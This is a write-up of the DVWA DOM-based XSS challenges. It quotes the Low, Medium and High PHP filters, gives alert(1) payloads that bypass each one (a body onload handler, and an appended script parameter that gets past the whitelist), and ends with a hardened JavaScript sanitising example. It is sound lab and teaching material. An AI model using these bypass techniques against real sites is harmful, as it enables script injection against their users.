DVWA Series - XSS (DOM)

This is a writeup about the XSS (DOM) challenges on DVWA (Damn Vulnerable Web App). Let's start.

DISCLAIMER: I DON'T PROMOTE THE USE OF THIS CODE IN A MALICIOUS WAY. HACKING MUST BE DONE LEGALLY AND WITH CONSENT.

Low

The page asks us to select a language and submit it. The selection is sent in the default query parameter:
http://localhost/vulnerabilities/xss_d/?default=
The PHP source for this level is empty, so there is no server-side filtering. We try putting <script>alert(1)</script> directly into the parameter to alert the number 1:
http://localhost/vulnerabilities/xss_d/?default=<script>alert(1)</script>

Payload : <script>alert(1)</script>

Medium

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?> 

Here the code checks whether the string <script appears anywhere in the parameter (stripos makes the check case-insensitive). It can be bypassed because the payload never needs a <script tag: we inject an option tag followed by a body tag whose onload handler alerts 1 when the page loads.

Payload : <option ><select><body onload=alert(1)></option>

High

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?> 

This time the PHP only accepts the four whitelisted language values. But there is still one thing we can do. The PHP whitelist only sees default=English, while the page's JavaScript reads everything after default= from the URL, so we can append the script as a second parameter of the query.

Payload : English&<script>alert(1)</script>
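A hardened version of the page's DOM sink, added here as an example (not DVWA's own code): it reads the default parameter with the URL parser and applies the High-level whitelist in the browser as well, and escapes anything that is still written out as markup. It assumes the vulnerable page takes the raw URL text after default= and writes it into an <option>; the three payloads from this writeup are used as the inputs.

```javascript
// Added example, not DVWA's own code: the DOM-side fix for the xss_d page.
// Assumption: the vulnerable page copies the raw URL text after "default="
// into an <option> with document.write, which is why the server-side
// checks above can be passed while the browser still runs the payload.

const ALLOWED_LANGUAGES = ["English", "French", "German", "Spanish"];

// Mirrors the unsafe extraction: everything after "default=", including any
// further "&..." parameters, so "English&<script>..." passes PHP but not this.
function rawDefaultParam(href) {
  const i = href.indexOf("default=");
  return i === -1 ? "" : href.substring(i + "default=".length);
}

// Hardened extraction: parse the query with the URL parser, then enforce the
// same whitelist in the browser that the High level enforces in PHP.
function safeDefaultParam(href) {
  const value = new URL(href).searchParams.get("default");
  return ALLOWED_LANGUAGES.includes(value) ? value : "English";
}

// Defence in depth for any code path that still builds markup as a string.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderOptionMarkup(lang) {
  const safe = escapeHtml(lang);
  return `<option value="${safe}" selected>${safe}</option>`;
}

// Side-by-side view of what each extraction yields for a given URL.
function compareExtractions(href) {
  return { raw: rawDefaultParam(href), safe: safeDefaultParam(href) };
}

// Constructed sample: the High-level bypass URL from the writeup.
const SAMPLE_HIGH_URL =
  "http://localhost/vulnerabilities/xss_d/?default=English&<script>alert(1)</script>";

console.log(compareExtractions(SAMPLE_HIGH_URL));
```

The raw extraction still hands the whole `English&<script>...</script>` tail to the page, while the parsed and whitelisted value collapses every payload above to a plain language name.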

